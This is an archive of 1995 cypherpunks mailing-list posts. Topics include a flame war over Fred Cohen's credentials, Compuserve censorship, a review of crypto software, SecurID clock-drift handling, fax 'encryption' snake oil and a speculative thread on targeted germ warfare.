In-Reply-To: <9512311704.AA03856@anon.penet.fi>
Message-ID: <9512311818.AA16259@all.net>
MIME-Version: 1.0
Content-Type: text


> Regarding Fred Cohen, PhD:
> 
> Cohen's haughty and bombastic style do nothing good for his reputation.  I
> assume he advertises his PhD to highlight his early accomplishments; he has
> done little since.

Apparently you have a reading disability.  I haven't used Ph.D. next to my
name on this forum for some time.

> Let's also consider the granting institution, a second-rank school.

When you insult me, that's one thing, but insulting my school is
something quite different.  The University of Southern California is one
of the finest educational institutions in the world, and is widely
recognized as such.  The engineering school at USC (from which I earned
my Ph.D.) is commonly ranked in the top 10 in the US, and in the year
that I graduated, my department was ranked in the top 5 in the US.

USC, in addition to having a fine athletic tradition, also has many
unique benefits that sets it apart from many other excellent schools. 
But I wouldn't want to advertise in this forum - you'll have to contact
them directly for more extensive information.

> Cohen's thesis broke new ground, but how many people have read it, or any of
> his writings, or know anything about his ideas beyond a single word?  How far
> did he carry this work?  Where are the conference and journal papers?  Cohen's
> reputation faded into obscurity long ago.  Now he is building a new reputation
> as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.

Some people are ignorant because they haven't had a chance to learn, but
other people are ignorant because they choose to be.  In your case, it is
apparently the latter.  But I will answer your questions nonetheless:

How many people have read it, or any of his writings, or know anything
about his ideas beyond a single word?

	The thesis has only sold a few hundred copies, however, over
	20,000 people have read my books on the subject.  My two
	articles in "The Sciences" reached about 25,000 people each.
	But I don't think thatr the value of peoples' work is a
	function of how many people know about them.

How far did he carry this work?

	I have published over 30 refereed journal articles on the subject,
	about 50 conference papers, about 100 invited talks, and today,
	over 1/2 of all computers in the world run virus defense software
	using techniques I first published.  That's more refereed papers
	than anyone else in the world on that particular subject.

Where are the conference and journal papers?

	They are listed on the Web site listed below.  They include
	IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM,
	DPMA, IFIP, and NIST conferences (as well as many others).

So, now that we have a very brief history of my work, let us all know
where you went to school, how many journal and conference papers you
have published, how many books you have written.

We already know that you won't tell people your name because you are
afraid to have it associated with you personally, but maybe you can help
us all understand how expert you are and what you have contributed to
the world so we can appreciate your point of view.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Sun, 31 Dec 1995 10:44:51 +0800
To: cypherpunks@toad.com
Subject: Massey, CEO of Compuserve, on Internet
Message-ID: <199512310220.NAA16258@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
>explaining how his company is "taking the high road by complying with the
>laws of Germany" in removing access to 200 Usenet groups.

>Timothy C. May

I assume that C$ is only filtering the newsfeed as it hits German shores?
Please tell me
they aren't denying access to these "banned" newsgroups for all users worldwide!

Mark
___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Mon, 1 Jan 1996 06:14:45 +0800
To: cypherpunks@toad.com
Subject: A great time to be a cypherpunk
Message-ID: <199512312146.NAA22286@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



   Amidst all the silliness, flames, and lunacy of this list, there's
a tremendous amount of exciting stuff going on. I thought I'd take the
opportunity to do one of those self-indulgent look back at the year
postings.

   Cypherpunks write code. One of the best things about 1995 was the
volume and quality of cpunk code that was released, and, perhaps
equally importantly, existing cpunk programs that continue to be
supported and improved.
   Here's a subjective top 5 list:

1. SSLeay, by Eric Young and Tim Hudson. Ordinarily, I wouldn't
consider a crypto library to be all that newsworthy, but SSLeay is
clearly an exception. SSLeay's real strength is its ability to be
integrated easily into real applications, including Apache/SSL,
Mosaic, telnet, etc.

I'll go out on a limb and guess that one of the reasons why SSLeay is
so good is that Eric has a lot of experience doing this kind of thing.
His libdes code dates back at least to 1990, and (I think) even
further.

2. Ssh, by Tatu Ylonen. There are a quite a few secure shells around.
What sets ssh apart is its dedication to usability. It is one of the
few crypto applications that is _more_ usable than the non-crypto
version. The transparent X forwarding is fabulous.

3. Mixmaster, by Lance Cottrell. Finally, we have remailers that come
close to real cryptographic security. The mixmasters are more
reliable, in addition to more secure, than the type-1 remailers. The
client is well written with a fairly easy interface. No wonder it's
becoming so popular.

4. Alpha.c2.org, by Matt Ghio. The idea of pseudonyms incorporating
strong cryptography has long been a cypherpunk dream. Thanks to Matt's
work in writing and maintaining this nymserver, it's now reality.
There are well over a thousand nyms registered on alpha.c2.org now,
and that's likely to increase now that automated tools are becoming
available.

5. Netscape, by Jeff Weinstein et al. Netscape Navigator is the first
massively popular program to incorporate strong crypto. The email
hasn't materialized yet, and there have been some scary statements by
top management, but I'm hopeful that this program will become the
primary vehicle for acheiving cypherpunk goals.

   Code, while important, is not the only useful cypherpunk activity.
It's also been a great year for getting the word out there. The Net
was _the_ hot story this year, and a lot of the coverage had a
cypherpunk spin. Much of the credit goes to Sameer Parekh for his PR
work. I know some cypherpunks dislike the "interview yourself" style
of press release writing, but I'm very glad that we've got someone on
our side who's good at it and is willing to put in the work.
   More broadly, we've found that our viewpoint and opinion matters.
People are at a loss for how to think about the Net and its social
implications. We've been thinking about that for a while, and have
something to add to the discussion, and people are listening.

   1995 will surely go down in history as the year that The Great
Drive to Censor the Net began. The powers that be will continue
pushing ahead with laws restricting speech, increasing liability for
speech, and outlawing strong crypto.
   A short term effect will be to create some real differentiation
between service providers. Up to now, the difference between one
service provider and another has been an equation with bits on one
side and dollars on the other. Starting soon, it will make a
difference in what information can be easily accessed. A domain name
of compuserve.com now clearly labels its account holder as a free
speech inactivist. More cypherpunkish domain names are a sign of not
being afraid of information.
   Over the long term, I agree with Lucky. The powers that be will
have some success in censoring the Unwashed Massnet. However,
cypherpunks will be able to create an infrastructure where freedom of
speech thrives. A large part of this work is the development of
censor-resistant protocols. My favorite such protocol is NNTP, even
though it contains no crypto.
   HTTP is also a bit censor-resistant because it's so easy to set up
a Web server. However, it still has grave weaknesses from this
perspective, because of the need for a full time Internet connection
_and_ storage in order to publish on the Web. The Web can become
either more centralized or more decentralized, and there are strong
forces pushing in both directions.
   I think the best hope for a cypherpunk Web is to emphasize dual-use
techniques, those that advance mundane as well as cpunk goals. For
example, distributed caching will make transfers go faster and make
"unable to connect to server; try connecting again later" errors much
less frequent. If done right, it can also make part-time Web servers
feasible, and perhaps make it extremely difficult to delete documents
that the publisher didn't want deleted (can anyone say "cryptographic
authentication?"). Similarly, the same crypto-enabled filters that
keep spam out of Joe Random's mailbox can drive a real public key
infrastructure (Web relevance: the Web is the natural home for a
pubkey infrastructure. Let's make sure to be there for the
housewarming party).

   The way that the low-tech protocols of the Web have crushed and
assimilated corporate Weblike networks is inspiring - it holds out
real hope we can win, even against opponents as dedicated and powerful
as governments. It will take hard work, tenacity, cooperation, and
technical sophistication, though. Remember that Windows took about
seven years to become successful.

   For dud of the year, I'd have to nominate Java. Don't get me wrong,
this language shows a lot of potential. But, to a large extent,
they've done the easy part, and the hard part remains. Given its
existing security model, it's difficult or impossible to do anything
really interesting with Java. Yet, fixing the security model _is_ the
hard part. Best of luck to the Java people and all javapunks, but I
think a strong case can be made that the hype machine went overboard.

   To all the cypherpunks who helped make 1995 such an exciting year,
best holiday greetings and wishes for 1996.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Mon, 1 Jan 1996 03:25:59 +0800
To: wb8foz@nrk.com
Subject: SecurIDs (was Re: Australian "calculatorcard")
Message-ID: <v02130500ad0c83fd970b@[198.115.179.213]>
MIME-Version: 1.0
Content-Type: text/plain


        amp <Alan.Pugh@internetMCI.COM> described his SecurID:

>> sounds like the card i use for remote dialup to certain non-public
>> systems i use at work. it has a six digit number on the front that
>> changes every 60 seconds.

        David Lesher <wb8foz@nrk.com> asked:

>Do these card systems use a window to handle clock-slip?

        SDI's ACE/Server or ACE access control module (ACM) has a Progress
RDBS built in which maintains a constantly-updated historical record of the
_relative_ drift in a particular token's clock-chip, relative to the clock
in the server or host.  When it receives the first identifier from a user
(Name) submitting a SecurID authentication call, the server checks the
database for the recorded drift and then predicts what that particular
token will use as Current Time.  CT, together with a token-specific secret
key, is then hashed to generate a token-code which is matched with that
submitted by the user,  together with the user's memorized PIN.

>I'd think you could have the server safely accept # N, N-60 sec, and
>N+60 seconds; and adjust the server's idea of your card's clock speed
>from that.

        You have it almost exactly right (or, at least, that's how SDI's
ACE/SecurID system handles it;-) SDI throws in a couple other factors:  the
ACE system handles Current Time in 30 or 60-second blocks (depending on the
model of SecurID token being authenticated,) so it needs a little leeway to
handle a token which, because of drift, slips into the next time-slot or
the one behind.

        The ACE system actually pre-calculates three token-codes -- each a
pseudo-random number, so one will not inform your guess of another -- as it
waits for a user's incoming authentication call to be completed.  The
server will approve access if it receives a token code generated from
either its _projected_ Current Time (for this particular token,) or the
token-codes generated from Current Time plus or minus one time-slot.

        When the ACE database indicates that this particular SecurID token
has not been used in the past 60 days (many sysadmin make this 90 days) it
also kicks in a search mode to minimize the false rejections.  In search
mode it calculates a series of prospective card-codes, sweeping out to a
maximum of 10 time-slots (the actual scope of the search is defined by the
sysadmin) fore and aft of whatever the database suggests this token should
consider Current Time.  If it finds a match between the token-code
submitted from a long-unused SecurID and one of those calculated by the
server in search mode, it updates its database projection for the drift of
that particular token and then requests the use to submit another PRN
token-code.  A search-mode "match" alone will never result in a user being
authenticated -- it only sets him or her up for a second formal
authentication cycle where a new PRN card-code is matched against a new set
of three token-codes.

        There are also a number of additional security devices and rules
which the server enforces to protect against security threats, racing
spoofs, stolen PINs, stolen tokens, etc.  The most obvious is a secured
record of all incoming authentication calls, recorded by token-code and GMT
time.  All incoming authentication calls are checked against this file. A
SecurID PRN token-code is never accepted twice, and the virtual
"time-stamp" within an incoming SecurID token-code must always be later and
in proper sequence to all other recorded authentication calls.
>
>What new risk would that create?

        If the SDI hash algorithm is of sufficient strength, very little, I
would think.

        (SDI just asked me to create an FAQ for their SecurID, so all
queries are welcome -- on-line or off.)

        Suerte,
                        _Vin


    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonnyx <jonnyx@edge.edge.net>
Date: Mon, 1 Jan 1996 04:40:18 +0800
To: cypherpunks@toad.com
Subject: (NOISE - LONG) Re: PLA_gue Germ Terrorism
Message-ID: <199512312003.OAA20537@edge.edge.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance: absolutely none!

Good lord, what nasty reactions! Maybe there's hope for us
after all. I'll allow myself one reply. Sorry 'bout the length.
 
< snip re: my bits on targetting specific genetic traits >

zinc wrote:

> this is so much shit.  targetting anything is very difficult.
> just ask all those people about the wonders of gene therapy. 
> hell, even the economist had an article about it's failures 
> recently (Dec 16-22 1995, p77).

Putting a person on the moon was considered impossible by most
folks 50 years ago. The German v-series rockets were cutting
edge technology. Now licensed hobbyists can buy solid fuel
motors that are just as powerful some of the ones the Nazis 
had (source: _High Power Rocketry_). Things change.
 
> in any event the so-called 'differences' you are imagining 
> are phenotypes.  these are a long cry from DNA.  i'm not 
> aware of any genetic markers available to distinguish a 
> black man from a white man. and, even if there were, 
> recombination requires long stretches of homology between 
> DNAs, not small differences.  i'd bet it's nearly impossible 
> to target black vs white vs yellow vs a gorilla.

Good. The article I read that suggested the possibility (I'm
pretty sure it was in _Science_ or _Scientific American_)
was rather spooky. I wish you'd said FLATLY impossible, though.
I'm (obviosly) not a biologist/geneticist/whatever, but aren't 
there bugs that go after only chimps? And didn't that ebola 
strain in Virginia only go after the lab monkeys, not the people?
 
...and from Jim Choate:

> Malarky.

< snip >

> Most of the threat of this type of experiments are from simple 
> infections since viruses are not easily raised with this form 
> of equipment.

People will have access to more and better equipment, though.

> One of my favorite 'technology rulers' is when the first strain 
> of commen yeast is released which produces THC or LSD. 

Heh. Guess they'll have to post extra guards at the Wonder Bread 
plant, eh? Woudn't want terrorists dosing little Jimmy's lunch.

< interesting stuff snipped >
 
> I do not believe we will see this in the near term using the 
> micro-manipulater systems which do direct injection of genetic 
> material because of the cost and utility requirements of such 
> equipment.

Which will probably become simplified, streamlined, and cheaper.
Who knows what techniques will be used 20-50 years from now?
Even though (fortunately) it seems that this kind of virus would
be much tougher to produce than I thought (if not impossible), 
I can still see someone trying it and infecting EVERYONE in his 
neighborhood/city/state.

And if it is possible, well, I'd rather have the idea explored 
and cures developed (with the info available to all) before any
would-be Hitler surprised us. 

Finally, from E. ALLEN SMITH

> E. Coli (the workhorse of prokaryotic genetics) can be a pathogen 
> if the right plasmid is inserted. 

> 	Incidentally, thanks to the person who quashed the 
> "black-seeking virus" idiot. 

Not my idea (I'm not that twisted; I find the idea horrifying). 
I read the suggestion in either _Science_ or _Scientific American_ 
(early 1993?). Incidently, the idea was a virus that went after
people with specific racial traits, not a "black-seeking virus". 
Don't attribute me with quotes that aren't mine. I have enough
problems with idiots who assume I'm a racist KKK country-music
loving redneck simply because I'm from Nashville.

> Human races are so far from being proper genetically distinct 
> subspecies that nobody competent would call them that, 

Guess what sunshine, they still teach this in mid- and high-schools.
Hell, even my dictionary sez "race - 1) a division of the human
population distinguished by physical characteristics transmitted
by genes." (Webster's II New Riverside Dictionary, if anyone cares)

> if they only weren't us.

Huh?

Now back to our regularly scheduled crypto (yeah, right).

-- 
 
|| ______    || comments, criticisms, and/or death-threats may be sent to: ||
|| \__  /\   ||            jonny anonymous, c/o jonnyx@edge.net            ||
|| __/ /  \  ||  or snail-mail pobox 23001, nashvegas tn 37202-3001, usa   ||
|| \__/_/\_\ ||______"DRIVING DRUNK ON THE INFORMATION SUPERHIGHWAY!"______||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Mon, 1 Jan 1996 04:55:25 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: Fred Cohen, PhD
In-Reply-To: <9512311818.AA16259@all.net>
Message-ID: <199512311909.OAA00177@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > Regarding Fred Cohen, PhD:
> > 
> > Cohen's haughty and bombastic style do nothing good for his reputation.  I
> > assume he advertises his PhD to highlight his early accomplishments; he has
> > done little since.
> 
> Apparently you have a reading disability.  I haven't used Ph.D. next to my
> name on this forum for some time.

	.oO( some time = ~3 weeks )

> > Let's also consider the granting institution, a second-rank school.
> 
> When you insult me, that's one thing, but insulting my school is
> something quite different.  The University of Southern California is one
> of the finest educational institutions in the world, and is widely
> recognized as such.

	.oO( So is Alabama State, even says so in the catalog )

>  The engineering school at USC (from which I earned
> my Ph.D.) is commonly ranked in the top 10 in the US, and in the year
> that I graduated, my department was ranked in the top 5 in the US.
> 
> USC, in addition to having a fine athletic tradition, also has many
> unique benefits that sets it apart from many other excellent schools. 
> But I wouldn't want to advertise in this forum - you'll have to contact
> them directly for more extensive information.

	.oO( I see you still have their catalog )

> > Cohen's thesis broke new ground, but how many people have read it, or any of
> > his writings, or know anything about his ideas beyond a single word?  How far
> > did he carry this work?  Where are the conference and journal papers?  Cohen's
> > reputation faded into obscurity long ago.  Now he is building a new reputation
> > as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.
> 
> Some people are ignorant because they haven't had a chance to learn, but
> other people are ignorant because they choose to be.  In your case, it is

	.oO( Some people just don't have two clues to rub together )

> apparently the latter.  But I will answer your questions nonetheless:
> 
> How many people have read it, or any of his writings, or know anything
> about his ideas beyond a single word?
> 
> 	The thesis has only sold a few hundred copies, however, over
> 	20,000 people have read my books on the subject.  My two
> 	articles in "The Sciences" reached about 25,000 people each.

	   ( I once told an OJ Simpson joke on Usenet )
	   ( that was supposedly seen by 40 million people )
	.OO( including a dozen messaiahs, three space men, )
           ( and a hermathadite. )

> 	But I don't think thatr the value of peoples' work is a
> 	function of how many people know about them.
> 
> How far did he carry this work?
> 
> 	I have published over 30 refereed journal articles on the subject,
> 	about 50 conference papers, about 100 invited talks, and today,
> 	over 1/2 of all computers in the world run virus defense software
> 	using techniques I first published.  That's more refereed papers
> 	than anyone else in the world on that particular subject.

	   ( Also gives Jerry Pournell something to talk about besides )
	.oO( Wing Commander, hope you add that to your resume )


> Where are the conference and journal papers?
> 
> 	They are listed on the Web site listed below.  They include
> 	IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM,
> 	DPMA, IFIP, and NIST conferences (as well as many others).

	   ( What? No WiReD magazine? How did he escape the crackpot )
	.oO( visionary center of the universe? )
	

> So, now that we have a very brief history of my work, let us all know
> where you went to school, how many journal and conference papers you
> have published, how many books you have written.
>
> We already know that you won't tell people your name because you are
> afraid to have it associated with you personally, but maybe you can help

	   ( Dr. Fred hides behind a post office box to people can't )
	.oO( drop by and tell him hes a loon )

> us all understand how expert you are and what you have contributed to
> the world so we can appreciate your point of view.

	.oO( I ain't no Ph.D, but even I can see Fred is a loon )

> -> See: Info-Sec Heaven at URL http://all.net/

	   ( Someone told him he was missing the /, was fun while it lasted )
	.oO( Wonder if he will write a paper on URL grammar now )

> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan L. Bostick)
Date: Mon, 1 Jan 1996 07:08:29 +0800
To: cypherpunks@toad.com
Subject: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C
Message-ID: <199512312219.OAA03598@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This turned up on alt.anonymous.  One would need a technical specification
or a working model to be sure, but it sounds like home-grown snake oil
to me.  My guess is that a nineteenth-century cryptanalyst could crack
this, and that the TLAs would have a field day.

What do other people think?

> 
>                 Complete Fax Privacy Draws Closer
> 
> 
>      Individuals receiving faxes, be they of a business or
> personal nature, will soon be able to encrypt the contents and
> make them unreadable to people for whom the messages are not
> intended.
>      The new fax encryption technology has been developed by the
> University of Rochester in New York.  The encryption program
> would make all faxes unreadable to the naked eye.  Only by
> placing a customized transparent plastic sheet over the message
> could it be made readable.  Each individual, employee or manager
> would be issued with his own plastic sheet and encryption key
> ensuring messages are only read by those specified in the message
> itself.  The encryption software would not slow the transmission
> and reception of fax messages and the cost of installing the
> system on to existing machines would be minimal.
>      Such software would be indispensable to those whose
> activities require the utmost confidentiality or privacy.  Nosy
> employees, rivals, those providing faxing services and anybody
> else who has, until now, had a birds eye view of your fax
> communications could be successfully abolished from the security
> equation.
>      Though the software has yet to be refined into a marketable
> commodity, it is set to be introduced for public consumption in
> the very near future.
> 
> 
>      Adam Starchild
>      Asset Protection & Becoming Judgement Proof at
>      http://www.catalog.com/corner/taxhaven
> 
> 
-- 
   Alan Bostick             | SWINDON:   What will history say?
Seeking opportunity to      | BURGOYNE:  History, sir, will tell lies as usual.
develop multimedia content. |    George Bernard Shaw, THE DEVIL'S DISCIPLE
Finger abostick@netcom.com for more info and PGP public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Mon, 1 Jan 1996 07:49:14 +0800
To: "Alan L. Bostick" <abostick@netcom.com>
Subject: Re: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C
In-Reply-To: <199512312219.OAA03598@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.951231144949.12131A-100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


	Alan:

On Sun, 31 Dec 1995, Alan L. Bostick wrote:

> This turned up on alt.anonymous.  One would need a technical specification
> or a working model to be sure, but it sounds like home-grown snake oil

	Sounds like snake oil to me.

> >                 Complete Fax Privacy Draws Closer
> > personal nature, will soon be able to encrypt the contents and
> > make them unreadable to people for whom the messages are not

	PGP & a fax modem & a good OCR provides this.

	Or PGP the message and either e-mail or telex it.
	
> > placing a customized transparent plastic sheet over the message
> > could it be made readable.  Each individual, employee or manager
> > would be issued with his own plastic sheet and encryption key

	A plastic sheet is going to let me read it, and nobody 
	else?  I guess that would work, if one was using ---
	I forgotten what it was called, where you cut a number
	of squares on a sheet of cardboard, put over a sheet
	of paper, write the characters in the spaces, then
	lift the sheet, and write garbage to fill up the rest
	of the sheet, so that nobody else can see what the 
	characters were.  I think I was in kindergarten when 
	we did that, untill we discovered that our teacher
	could read our "secret" messages, without the cardboard
	sheet.  << The handwriting of the real message differed
	from that of the garbage words. >>

> >      Though the software has yet to be refined into a marketable
> > commodity, it is set to be introduced for public consumption in
> > the very near future.
	
	Is this the same as Jerry Pournelle "real soon now'?

	I think I'll stick to using PGP and sending e-mail.

        xan

        jonathon
        grafolog@netcom.com



****************************************************************
	
	Opinions represented are not necessarilly mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Basspunx@aol.com
Date: Mon, 1 Jan 1996 04:48:01 +0800
To: cypherpunks@toad.com
Subject: put me on the list
Message-ID: <951231150900_103045223@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


i would like to be put on the cypherpunks mailing list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 1 Jan 1996 08:07:52 +0800
To: "Alan L. Bostick" <abostick@netcom.com>
Subject: Re: Is this as insecure as it sounds (was FWD: Complete Fax Privacy Draws C
In-Reply-To: <199512312219.OAA03598@netcom17.netcom.com>
Message-ID: <Pine.SOL.3.91.951231151435.902C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


If the plastic sheet is just a fixed mask, then this scheme yields 
instantly to chosen  plain-text (just send an all-black page), really 
quickly to known-plaintext, and pretty quickly to multiple cyphertexts.

There's got to be more to it than that

Simon

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Mon, 1 Jan 1996 08:22:12 +0800
To: cypherpunks@toad.com
Subject: [LOCAL] Next cpx physical meeting in SF Bay area?
Message-ID: <199512312335.PAA27743@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


It's been about a year since I've been to a cpx physical meeting in the SF
area (other than T.C. May's house meeting--thanks again, Tim.  The
AetherWire folks gave a fascinating talk).  I haven't seen much talk here on
the list, either.  Is this still a regular thing?  Back then, we were having
marathon meetings at SGI's IRIS cafe on the first Sat. of the month.  

What goes on these days?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 1 Jan 1996 05:11:34 +0800
To: cypherpunks@toad.com
Subject: (fwd) e$: Looking down, not up, to the future
Message-ID: <v02120d05ad0ca5b74904@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Sender: e$@thumper.vmeng.com
Reply-To: rah@shipwright.com (Robert Hettinga)
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 29 Dec 1995 15:07:53 -0500
Precedence: Bulk
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: e$: Looking down, not up, to the future

-----BEGIN PGP SIGNED MESSAGE-----

e$: Looking down, not up, to the future

12/29/95

First a little administrivia. Going forward, I'm going to be posting my
rants here first at e$@thumper.vmeng.com, with a forward from e$ of the
given rant, after some arbitrary delay, to any other lists that might be
appropriate to the subject. My sponsors have paid for this list, and the
readership of the e$pam and e$ are there to hear what I and others have
to say about e$ and its consequences here, and so my stuff goes onto the
e$ list first from now on. Like all my writing on the net,
redistribution with attribution to me and the other people I cite (When
remember to cite them all...) here is just fine. If you're publishing
it, and you pay your authors, I'd like to be compensated too, of course.

Not that what I say here is going to be all that earthshaking, but I
thought I'd clear the air a bit.



I've read a lot of interesting things about the future of the net in the
last few weeks, some of which I've sent on to e$pam, and I'd like to
talk about them, by way of clearing the decks for the New Year.

First, I'd like to go revise my model of net.reality a bit.

Most of people look at the net as a hierarchy. Architecturally, it is
exactly that, from the IP addressing scheme, to the object
super-hierarchies in component software models, to server-mirroring, to
just about any kind of structural component of the net you would care to
look at.

Physically, big lines get broken up by big switches into smaller lines
which get broken up by smaller switches into smaller lines, in a fractal
process which ends up at you or me, where it goes back up each larger
level to get where it needs to go.

In software, the CORBA object model, and the super-object-model that the
research people have been cooking up at Microsoft, all have a "root"
somewhere; the "top" of their taxonomical system, if you will.

In information, there's a source of the information, and it gets
accreted with other information and synthesized and averaged and
summarized and rolled up into some larger aggregate which allows you to
have some knowlege about that information and other information like it.

In finance, my money gets pooled with other people's money through
several larger aggregation layers and then invested or spent centrally
somewhere. The recipient of capital or cashflow then spends or invests
it in fractally smaller chunks until I get it in a check for something I
do.

I could go on and on with this, but you can see my point, and it is the
same point Rich Lethin loves to use on *me* when I start talking about
"geodesic" anything, that is, the idea that Moore's law exponentially
collapses switching costs, making nodes cheaper than lines, making the
network and the software processes mapped onto it more geodesic instead
of hierarchical, and "surfacting" information and software into
fractally smaller and smaller pieces.

What I've been saying to Rich, particularly when I talk about geodesic
networks, is that the message itself is point-to-point, even though the
actual electrons may flow more or less hierarchically around the
network. That's kept him busy while I made my getaway. It always felt
like a sophistic shuck, myself, but I'd learned to live with it until
now.

I don't know if I've gotten anywhere, but I've been thinking about it a
bit, thrashing anologies from other parts of the world, --the major way
I think, unfortunately -- to describe what I see out there. I've been
thinking about biological models, because in my stranger moments, I like
pretend that the net is an electro-biological entity.

For instance, the circulation of blood is a good anology, I think,
because all the endocrine messages in the blood stream are ultimately
broadcast from a single cell and paradoxically sent point to point to
another cell -- just like things are on an ethernet wire, or on Gilder's
fanciful dark fiber, even though the circulatory "backbone" is
hierarchical.

The most obvious example of course is the organization of neurons, in
that the brain pathways are essentially geodesic, but we still have to
deal with the hierarchy of nerves outside of the brain.

The one thing I think that differentiates these models from the
hierarchies we encounter in social life, the industrial induced control
hierarchies we all rail against, and the stuff I like to quixotically do
battle with on the net, is that every one of those biological
hierarchies is chaotic. There is no pretense of top-down control of the
system. The load of the system is hierarchical, and so the system
organizes itself hierarchically. There are physical forces which create
physically hierarchical stuctures, but they're usually set up to solve
the problem of efficient distribution of something over a distance, like
draining a watershed, or getting blood to a central heart and lungs, or
nerve impulses back and forth to the brain.

When distance isn't a problem, networks, like the brain, tend to get
more geodesic. Bandwidth is maintained by an abundance of neuronic
"switches", doubling as processors, tripling as memory, each with some
number of connections to other neurons, rather than a bunch of "fat"
nurons doing all the signal processing. As an exception which proves the
rule, note there *are* in fact "fat" neurons, more precisely redundant
neuron pathways, particularly between the two halves of the brain, and
between the brain and the rest of the body.

So, what else is new? We still have hierarchies on the net, right? We're
about to bump up by many orders of magnitude the number of possible IP
addresses real soon, so that someday your toaster can tell your alarm
clock to wake you for breakfast. I've ranted, tounge-in-cheek, about the
"dangers" of the "X.blabla" book-entry view of the world, with
hierarchical, government-as-root certification "authorities", and the
consequences of having an audit trail on your every net-based financial
activity. Most of this X.blabla stuff will come to pass, mostly because
it's the easiest thing for the financial system as it's currently
organized to do. It's sort of like financial "shovelware", moving the
contents of one financial medium, the hierarchic industrial paradigm of
government regulated central banking systems onto the new medium of the
internet.

However, in a world of micro-pay-as-you-go packet routing, where routers
may someday spot-auction their bandwidth on a demand basis at packet
prices displayed best in scientific notation, all those audit threads
could lead to a Gulliverian restraint on personal freedom, much less on
individual privacy.

Fortunately, I don't think that's going to happen, because those same
Lilliputian audit trails will just get in the way and slow the system to
a standstill. We need to get more chaotic.

I think my contention on this is that as we get smaller and smaller, the
more chaotic it's going to have to be. Book-entry based transaction
processing systems will choke on their own accounting at those levels.
To look at the extremely-hypothetical router above, it will be easier to
attach some digital bearer microcertificates to an information packet,
so that the packet pays its way through all the routers it needs to go
to, than it will be for some giant book entry system to account for it
all. People have said that those microcertificates could work like
stamps, where the first router cancels the stamp and pays back the other
routers in the route some fraction of the "stamp" price to be settled
later, or it may be possible to simply endow a packet with all the
certificates nessary to get from point to point in a network someday. It
kind of reminds me digital cash-as-processor-food, a bit.

Note that this kind of bio-economic thinking is not new, the Agorics
folks and Stewart Brand have been talking about this stuff for quite a
while. My point here is that "down" the network, not up, is the place to
look for the interesting stuff in the future.

There are several interesting micropayment certificate systems out
there, and there will be more. As software gets smaller and smaller with
component architectures like OpenDoc and its eventual successors, it
will be more and more economic to charge rediculously smaller and
smaller amounts for rediculously smaller and smaller network behaviors.
Just wait until someone figures how to get software to really "evolve",
or gets software to write other software on a practical basis.


Most of the people I read, on the net or off, don't see this. They're
looking "up" the net, how connections are made up, at the level of the
grosser network features, like how monolithic corporations, or
book-entry database and financial control systems, or government
regulations, will happen on the net. How the net will integrate itself
with the "real" world they're familiar with.

8 years ago, I used to talk about people who lived "on" microcomputers
versus the ones who lived "in" them. I used to say that Macs were more
for people who lived "in" computers because they weren't hindered by the
mechanics of the interface so much. I think that there are still a lot
of mainframe-cum-client/server folks out there who still live "on" the
net, and not in it. Those are the people who are looking "up" at how the
"big" players will behave, when they should be look at their feet, where
the real action is.

Where the very ground is in the process of dissoving out from under
them.

Cheers,
Bob Hettinga


